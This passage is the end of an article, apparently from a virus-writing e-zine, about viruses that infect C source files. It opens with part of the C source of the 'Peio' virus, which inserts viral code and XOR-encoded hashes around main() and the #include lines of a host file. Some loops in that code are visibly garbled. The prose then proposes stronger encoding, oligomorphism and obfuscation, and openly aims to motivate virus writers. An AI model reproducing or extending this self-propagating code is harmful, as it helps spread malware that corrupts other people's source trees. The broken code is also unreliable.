((mpos=(int)strstr(ptr,"\nmain("))>0) || ((mpos=(int)strstr(ptr,"\nint main("))>0) || ((mpos=(int)strstr(ptr,"\nvoid main("))>0) || ((mpos=(int)strstr(ptr,"\nmain ("))>0) || ((mpos=(int)strstr(ptr,"\nint main ("))>0) || ((mpos=(int)strstr(ptr,"\nvoid main ("))>0) ) ) { mpos = (int)strstr((void *)mpos, ";\n"); mpos -= (int)--ptr; if( !(ipos = (int)strstr(++ptr, "#include <")) ) { munmap(ptr, size); break; } munmap(ptr, size); page = 3 * (int)sysconf(_SC_PAGESIZE); ftruncate(fd, size+page); ptr = mmap(NULL,size+page,PROT_READ+PROT_WRITE,MAP_SHARED,fd,0); ipos = (int)strstr(ptr, "#include <"); ipos = (int)strstr((void *)ipos, "\n\n"); ipos -= (int)ptr; for(i=0;i=0;i--) memcpy(ptr+ipos+i*ihole+ihole, ptr+ipos+i*ihole, ihole); memcpy(ptr+ipos, hashinc, ihole); for(i=0;i=0;i--) memcpy(ptr+mpos+i*thole+thole, ptr+mpos+i*thole, thole); memcpy(ptr+mpos, buf, thole); bhole = strlen(hashbeg); memcpy(ptr+size+ihole+thole, hashbeg, bhole); memcpy(ptr+size+ihole+thole+bhole, hashinc, ihole); bhole += ihole; sprintf(ptr+size+ihole+thole+bhole, "\";\n\tchar hashbeg[] = \""); bhole += 22; for(i=0;i <-end of peio.c-------------------------------------------------------------> <---------------------------------------------------------------------------> As we can see, hashes are XORed with 80h, and it's necessary to reXOR them to be able to write the code in the host file. This way to keep hashes opens a route to polymorphism, since in each generation, the key of XOR "encryption" could vary from 80h to FFh. 4.4.- Future developments These examples are not "real fire", there are several mistakes in the commented code. However, we follow developing these and new examples, treating to incorporate more functionalities or new approaches. Mainly, the most scandalous part is the related one to the size of arrays that contain the code that we want to include. It's quite problematic to try to print some chars that fall within the 32 first positions in ASCII table, so is necessary to observe how this problem is solved in other scenes like the delivery of electronic mail or news. In this sense, we can contemplate several possibilities: 1) Using uuencode/uudecode. 2) Using base64. 3) Using yEnc [14], an alternative to both previous points, that uses ASCII > 127, but is able to avoid problematic chars (i.e. NULL, DEL, etc.). 4) The use of our own protocols of conversion of char arrays, with combinations of XORs, sums, etc. improved, that could include simple compression as RLE, for instance. In addition to these improvements, we could think about incorporating oligomorfism to the programs creating several routines and "encrypting" them with random keys in each generation, and several routines of deciphering. Much of this approach is quite done in the "Peio" virus, where the possible keys cause that exist 127 different combinations at the time of creating hashes. As later steps, the efforts could be directed towards the total viral code obfuscation, the introduction of this code merged with the original one, or generating the needed hashes by calculating them as a result of a bunch of code (it is a very great number, we could create code whose result is that number and thus not to store it, but generate it every time). 5.- Conclusions Source code viruses are not a very serious threat at the moment, but if the commented techniques are improved, they could be a important point. Many methods exist to audit the integrity of the disc files like md5sum, tripwire, etc. Nevertheless, if we extend the paranoia to all that happens through our circuits, the threat of a first trojanised compiler still flies over our heads in UNIX systems. I would like that this text would be useful to explain all stuff done in this subject and motivate virus writers to develop new and better techniques. However, I consider myself as a extreme Free Software defender and I would want that this code becomes useful to increase the security within the Free Software community and not to the opposite. Finally I would like to say thanks to all those who have helped me to write this text: the int80h crew, elisasm, silviex, sheroc, a young samurai, and mainly to all the 29a crew that follows year after year in the sharpest edge of the virus scene. VirusBuster, thanks for allowing me to write in the best viral e-zine worldwide. Thanks really ;-) 6.- Related Links [1] Free Software Song http://www.gnu.org/music/free-software-song.html [2] Linux Malware: Debunking the myths. Phil d'Espace. Virus Bulletin, September - 2002 http://www.virusbtn.com/magazine/archives/200209/linux_malware.xml [3] BitchX 1.0c19 IRC Client Backdoored. http://slashdot.org/article.pl?sid=02/07/02/1327208&mode=thread http://www.securityfocus.com/archive/1/280009/2002-06-28/2002-07-04/0 [4] Clues, Vandalism, Litter Sendmail Trojan Trail. http://www.securityfocus.com/news/1113 http://cert-nl.surfnet.nl/i/2002/I-02-03.htm [5] Virus Encyclopedia, File Viruses, DOS: Urphin.1621. http://www.viruslist.com/eng/VirusList.asp?page=0&mode=1&id=2414&key=000010000102404 [6] The History of Computer Viruses. http://www.virus-scan-software.com/virus-scan-help/answers/the-history-of-computer-viruses.shtml [7] Die-hard virus. http://www.pspl.com/virus_info/dos/diehard.htm [8] OBJ, LIB Viruses and Source Code Viruses. http://www.viruslist.com/eng/viruslistbooks.html?id=36 [9] Shell viruses. Gobleen Warrior & zert. http://29a.host.sk/29a-6/29a-6.212 [10] Polymorphism/Encryption/EPO in Perl Viruses. SnakeByte. http://29a.host.sk/29a-6/29a-6.220 [11] Reflections on Trusting Trust. Ken Thompson. http://www.acm.org/classics/sep95/ [12] Linux Security Auditing: Re: Reflections on Trusting Trust. http://lists.insecure.org/lists/security-audit/2000/Apr-Jun/0222.html http://lists.insecure.org/lists/security-audit/2000/Apr-Jun/0226.html [13] Shared Source: A Dangerous Virus. http://www.opensource.org/advocacy/shared_source.php [14] yEnc - Broken Tools. http://www.yenc.org